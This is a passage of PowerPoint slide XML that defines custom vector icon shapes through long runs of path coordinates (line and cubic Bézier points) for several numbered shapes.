                  <a:pt x="8345" y="8414"/>
                  <a:pt x="9225" y="6480"/>
                  <a:pt x="10309" y="6480"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="6480"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12375" y="6480"/>
                  <a:pt x="13255" y="8414"/>
                  <a:pt x="13255" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="13186"/>
                  <a:pt x="12375" y="15120"/>
                  <a:pt x="11291" y="15120"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7654" y="13593"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2363" y="19413"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1593" y="19135"/>
                  <a:pt x="982" y="15391"/>
                  <a:pt x="982" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="6209"/>
                  <a:pt x="1593" y="2465"/>
                  <a:pt x="2363" y="2187"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7654" y="8007"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7470" y="8854"/>
                  <a:pt x="7364" y="9799"/>
                  <a:pt x="7364" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="11802"/>
                  <a:pt x="7470" y="12747"/>
                  <a:pt x="7654" y="13593"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="19145" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19066" y="0"/>
                  <a:pt x="18994" y="51"/>
                  <a:pt x="18928" y="124"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18925" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13374" y="6221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12841" y="5047"/>
                  <a:pt x="12105" y="4320"/>
                  <a:pt x="11291" y="4320"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="4320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9495" y="4320"/>
                  <a:pt x="8758" y="5047"/>
                  <a:pt x="8225" y="6221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671" y="124"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2606" y="51"/>
                  <a:pt x="2534" y="0"/>
                  <a:pt x="2455" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1099" y="0"/>
                  <a:pt x="0" y="4835"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16765"/>
                  <a:pt x="1099" y="21600"/>
                  <a:pt x="2455" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2534" y="21600"/>
                  <a:pt x="2605" y="21549"/>
                  <a:pt x="2671" y="21477"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674" y="21486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8225" y="15379"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8758" y="16554"/>
                  <a:pt x="9495" y="17280"/>
                  <a:pt x="10309" y="17280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="17280"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12105" y="17280"/>
                  <a:pt x="12842" y="16554"/>
                  <a:pt x="13375" y="15379"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18940" y="21501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18941" y="21496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19003" y="21560"/>
                  <a:pt x="19072" y="21600"/>
                  <a:pt x="19145" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20501" y="21600"/>
                  <a:pt x="21600" y="16765"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="4835"/>
                  <a:pt x="20501" y="0"/>
                  <a:pt x="19145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3" name="Shape 2733"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636041" y="5015799"/>
            <a:ext cx="10157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364"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2804" y="17041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9142" y="5518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9803" y="5724"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9859" y="5747"/>
                  <a:pt x="9925" y="5764"/>
                  <a:pt x="9991" y="5783"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10130" y="5826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10141" y="5820"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10339" y="5861"/>
                  <a:pt x="10555" y="5891"/>
                  <a:pt x="10800" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11045" y="5891"/>
                  <a:pt x="11261" y="5861"/>
                  <a:pt x="11459" y="5820"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11470" y="5826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="5783"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11675" y="5764"/>
                  <a:pt x="11741" y="5747"/>
                  <a:pt x="11797" y="5724"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12457" y="5518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14283" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10054" y="8836"/>
                  <a:pt x="9450" y="9056"/>
                  <a:pt x="9450" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9450" y="9599"/>
                  <a:pt x="10054" y="9818"/>
                  <a:pt x="10800" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14824" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18796" y="17041"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18796" y="17041"/>
                  <a:pt x="10800" y="20364"/>
                  <a:pt x="10800" y="20364"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2776" y="2264"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3291" y="1541"/>
                  <a:pt x="6683" y="982"/>
                  <a:pt x="10800" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14917" y="982"/>
                  <a:pt x="18308" y="1541"/>
                  <a:pt x="18825" y="2264"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="4765"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="4765"/>
                  <a:pt x="2776" y="2264"/>
                  <a:pt x="2776" y="2264"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21551" y="17094"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21578" y="17093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17575" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18900" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19646" y="9818"/>
                  <a:pt x="20250" y="9599"/>
                  <a:pt x="20250" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20250" y="9056"/>
                  <a:pt x="19646" y="8836"/>
                  <a:pt x="18900" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17036" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14828" y="4820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14801" y="4822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14795" y="4812"/>
                  <a:pt x="14792" y="4803"/>
                  <a:pt x="14785" y="4793"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20920" y="2881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20909" y="2874"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21315" y="2789"/>
                  <a:pt x="21600" y="2637"/>
                  <a:pt x="21600" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="1099"/>
                  <a:pt x="16764" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4836" y="0"/>
                  <a:pt x="0" y="1099"/>
                  <a:pt x="0" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2637"/>
                  <a:pt x="285" y="2789"/>
                  <a:pt x="691" y="2874"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="680" y="2881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="4793"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6808" y="4802"/>
                  <a:pt x="6805" y="4812"/>
                  <a:pt x="6799" y="4822"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6772" y="4820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="17093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="17094"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="17123"/>
                  <a:pt x="0" y="17151"/>
                  <a:pt x="0" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17306"/>
                  <a:pt x="137" y="17416"/>
                  <a:pt x="345" y="17502"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="335" y="17505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9785" y="21432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9795" y="21429"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10041" y="21532"/>
                  <a:pt x="10394" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11206" y="21600"/>
                  <a:pt x="11557" y="21532"/>
                  <a:pt x="11805" y="21429"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11815" y="21432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21265" y="17505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21255" y="17502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21463" y="17416"/>
                  <a:pt x="21600" y="17306"/>
                  <a:pt x="21600" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="17151"/>
                  <a:pt x="21566" y="17123"/>
                  <a:pt x="21551" y="170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4" name="Shape 2734"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="5053889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9450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9140" y="9450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8293" y="7123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8289" y="7126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8208" y="6906"/>
                  <a:pt x="8046" y="6750"/>
                  <a:pt x="7855" y="6750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7663" y="6750"/>
                  <a:pt x="7501" y="6906"/>
                  <a:pt x="7420" y="7126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7415" y="7123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6569" y="9450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="9450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5129" y="9450"/>
                  <a:pt x="4909" y="9752"/>
                  <a:pt x="4909" y="10125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="10571"/>
                  <a:pt x="5128" y="10687"/>
                  <a:pt x="5128" y="10687"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6405" y="11857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5914" y="14014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5905" y="14067"/>
                  <a:pt x="5891" y="14118"/>
                  <a:pt x="5891" y="14175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="14548"/>
                  <a:pt x="6110" y="14850"/>
                  <a:pt x="6382" y="14850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6483" y="14850"/>
                  <a:pt x="6574" y="14801"/>
                  <a:pt x="6650" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="13636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9055" y="14737"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9055" y="14737"/>
                  <a:pt x="9127" y="14850"/>
                  <a:pt x="9327" y="14850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9599" y="14850"/>
                  <a:pt x="9818" y="14548"/>
                  <a:pt x="9818" y="14175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="14117"/>
                  <a:pt x="9798" y="14070"/>
                  <a:pt x="9787" y="14017"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9304" y="11857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10581" y="10687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10581" y="10687"/>
                  <a:pt x="10800" y="10571"/>
                  <a:pt x="10800" y="10125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="9752"/>
                  <a:pt x="10580" y="9450"/>
                  <a:pt x="10309" y="9450"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13255" y="11475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15218" y="11475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15490" y="11475"/>
                  <a:pt x="15709" y="11173"/>
                  <a:pt x="15709" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="10427"/>
                  <a:pt x="15490" y="10125"/>
                  <a:pt x="15218" y="10125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13255" y="10125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="10125"/>
                  <a:pt x="12764" y="10427"/>
                  <a:pt x="12764" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="11173"/>
                  <a:pt x="12983" y="11475"/>
                  <a:pt x="13255" y="11475"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="12150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="12150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="12150"/>
                  <a:pt x="12764" y="12452"/>
                  <a:pt x="12764" y="12825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="13198"/>
                  <a:pt x="12983" y="13500"/>
                  <a:pt x="13255" y="13500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="13500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="13500"/>
                  <a:pt x="16691" y="13198"/>
                  <a:pt x="16691" y="12825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="12452"/>
                  <a:pt x="16471" y="12150"/>
                  <a:pt x="16200" y="12150"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="14768"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20618" y="17550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="17550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="14768"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2102" y="14393"/>
                  <a:pt x="2945" y="12759"/>
                  <a:pt x="2945" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="8841"/>
                  <a:pt x="2102" y="7207"/>
                  <a:pt x="982" y="6832"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="4050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="4050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="6832"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19498" y="7207"/>
                  <a:pt x="18655" y="8841"/>
                  <a:pt x="18655" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="12759"/>
                  <a:pt x="19498" y="14393"/>
                  <a:pt x="20618" y="14768"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="20250"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="20250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="18900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="18900"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="18900"/>
                  <a:pt x="20618" y="20250"/>
                  <a:pt x="20618" y="20250"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673" y="20250"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="20250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="18900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="18900"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="18900"/>
                  <a:pt x="17673" y="20250"/>
                  <a:pt x="17673" y="20250"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="1350"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17673" y="1350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="2700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="2700"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="2700"/>
                  <a:pt x="982" y="1350"/>
                  <a:pt x="982" y="1350"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18655" y="1350"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20618" y="1350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="2700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="2700"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="2700"/>
                  <a:pt x="18655" y="1350"/>
                  <a:pt x="18655" y="1350"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21109" y="8100"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="8100"/>
                  <a:pt x="21600" y="7798"/>
                  <a:pt x="21600" y="7425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lnTo>
                  <a:pt x="982" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="439" y="0"/>
                  <a:pt x="0" y="605"/>
                  <a:pt x="0" y="1350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="7425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7798"/>
                  <a:pt x="220" y="8100"/>
                  <a:pt x="491" y="8100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1304" y="8100"/>
                  <a:pt x="1964" y="9309"/>
                  <a:pt x="1964" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="12291"/>
                  <a:pt x="1304" y="13500"/>
                  <a:pt x="491" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="13500"/>
                  <a:pt x="0" y="13802"/>
                  <a:pt x="0" y="14175"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="209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4175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="13802"/>
                  <a:pt x="21380" y="13500"/>
                  <a:pt x="21109" y="13500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20296" y="13500"/>
                  <a:pt x="19636" y="12291"/>
                  <a:pt x="19636" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="9309"/>
                  <a:pt x="20296" y="8100"/>
                  <a:pt x="21109" y="8100"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="8100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="8100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="8100"/>
                  <a:pt x="12764" y="8402"/>
                  <a:pt x="12764" y="8775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="9148"/>
                  <a:pt x="12983" y="9450"/>
                  <a:pt x="13255" y="9450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="9450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="9450"/>
                  <a:pt x="16691" y="9148"/>
                  <a:pt x="16691" y="8775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="8402"/>
                  <a:pt x="16471" y="8100"/>
                  <a:pt x="162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5" name="Shape 2735"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="5041193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2000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="12000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="12000"/>
                  <a:pt x="13745" y="11732"/>
                  <a:pt x="13745" y="11400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="11068"/>
                  <a:pt x="13526" y="10800"/>
                  <a:pt x="13255" y="10800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11020" y="10800"/>
                  <a:pt x="10800" y="11068"/>
                  <a:pt x="10800" y="11400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="11732"/>
                  <a:pt x="11020" y="12000"/>
                  <a:pt x="11291" y="12000"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11291" y="13800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="13800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12544" y="13800"/>
                  <a:pt x="12764" y="13532"/>
                  <a:pt x="12764" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="12868"/>
                  <a:pt x="12544" y="12600"/>
                  <a:pt x="12273" y="12600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="12600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11020" y="12600"/>
                  <a:pt x="10800" y="12868"/>
                  <a:pt x="10800" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="13532"/>
                  <a:pt x="11020" y="13800"/>
                  <a:pt x="11291" y="13800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11291" y="15600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="15600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="15600"/>
                  <a:pt x="13745" y="15332"/>
                  <a:pt x="13745" y="15000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="14668"/>
                  <a:pt x="13526" y="14400"/>
                  <a:pt x="13255" y="14400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="14400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11020" y="14400"/>
                  <a:pt x="10800" y="14668"/>
                  <a:pt x="10800" y="15000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="15332"/>
                  <a:pt x="11020" y="15600"/>
                  <a:pt x="11291" y="15600"/>
                </a:cubicBezTo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000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="3332"/>
                  <a:pt x="3165" y="3600"/>
                  <a:pt x="3436" y="3600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3708" y="3600"/>
                  <a:pt x="3927" y="3332"/>
                  <a:pt x="3927" y="3000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927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20127" y="15600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19856" y="15600"/>
                  <a:pt x="19636" y="15868"/>
                  <a:pt x="19636" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="16532"/>
                  <a:pt x="19856" y="16800"/>
                  <a:pt x="20127" y="16800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="16800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="16800"/>
                  <a:pt x="21600" y="16263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091" y="13116"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6156" y="13983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5747" y="15581"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5738" y="15620"/>
                  <a:pt x="5727" y="15657"/>
                  <a:pt x="5727" y="15700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5727" y="15976"/>
                  <a:pt x="5911" y="16200"/>
                  <a:pt x="6136" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6221" y="16200"/>
                  <a:pt x="6296" y="16164"/>
                  <a:pt x="6360" y="16110"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7364" y="15301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8364" y="16116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8364" y="16116"/>
                  <a:pt x="8424" y="16200"/>
                  <a:pt x="8591" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8817" y="16200"/>
                  <a:pt x="9000" y="15976"/>
                  <a:pt x="9000" y="15700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9000" y="15657"/>
                  <a:pt x="8983" y="15622"/>
                  <a:pt x="8974" y="15583"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8572" y="13983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9636" y="13116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9636" y="13116"/>
                  <a:pt x="9818" y="13030"/>
                  <a:pt x="9818" y="12700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="12424"/>
                  <a:pt x="9635" y="12200"/>
                  <a:pt x="9409" y="12200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8435" y="12200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7730" y="10477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7726" y="10479"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7658" y="10315"/>
                  <a:pt x="7524" y="10200"/>
                  <a:pt x="7364" y="10200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7204" y="10200"/>
                  <a:pt x="7069" y="10315"/>
                  <a:pt x="7001" y="10479"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6998" y="10477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6293" y="12200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5319" y="12200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5092" y="12200"/>
                  <a:pt x="4909" y="12424"/>
                  <a:pt x="4909" y="12700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="13030"/>
                  <a:pt x="5091" y="13116"/>
                  <a:pt x="5091" y="13116"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17673" y="7200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="7200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="6000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="6000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="6000"/>
                  <a:pt x="17673" y="7200"/>
                  <a:pt x="17673" y="7200"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
